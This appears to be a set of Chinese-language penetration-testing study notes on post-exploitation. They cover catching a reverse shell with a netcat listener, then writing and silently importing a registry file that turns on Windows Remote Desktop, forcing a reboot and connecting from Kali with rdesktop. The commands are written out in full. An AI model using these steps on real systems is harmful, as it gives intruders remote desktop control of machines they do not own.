理想状态 是反弹shell回来

所以 我就要用nc侦听444这个端口

nc -vlp 444

前期可能生出的shellcode 是在结束之后会导致程序的崩溃 但是新版本的shellcode可能做啦优化这一部分 结束之后让下一个线程去接收

打开桌面环境

在此基础上在目标程序性安装图成画的远程客户端在目标机器上得以执行

使用payload的情况下 vnc 可以查看到远程目标桌面环境

最简单 就是rdp 拿到命令行的管理权的时候 如何通过命令行的管理权打开远程桌面服务

windows里面做的大部分配置90% 配置的参数选修是存在注册表里面的 linux 是每一个软件存在配置文件里面

windows 快照抓取的方式找到啦打开远程桌面的注册表的键值

reg是windows注册表文件

dir查看当前目录

重启 

开启防火墙里面的远程服务 通过修改注册表完成

可以通过抓取注册表来确定到底是那个注册表

注册表快照 保存注册表当前快照

rdesktop    //linux下的远程桌面

regsnap 可以把注册表进行实时快照

先开始监听shellcode中LPORT端口

发送shellcode脚本

通过修改注册表打开服务器的远程桌面服务

echo Windows Registry Editor Version 5.00>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg

重启服务器让命令生效

shutdown -r -t 0

kali安装并执行远程桌面服务

apt-get install rdesktop
rdesktop +ip

注意：若连接不上，可能是防火墙阻止

注意：RegSnap软件可以对注册表拍摄快照，通过修改防火墙设置前后的快照比较，可以找出要修改的注册表路径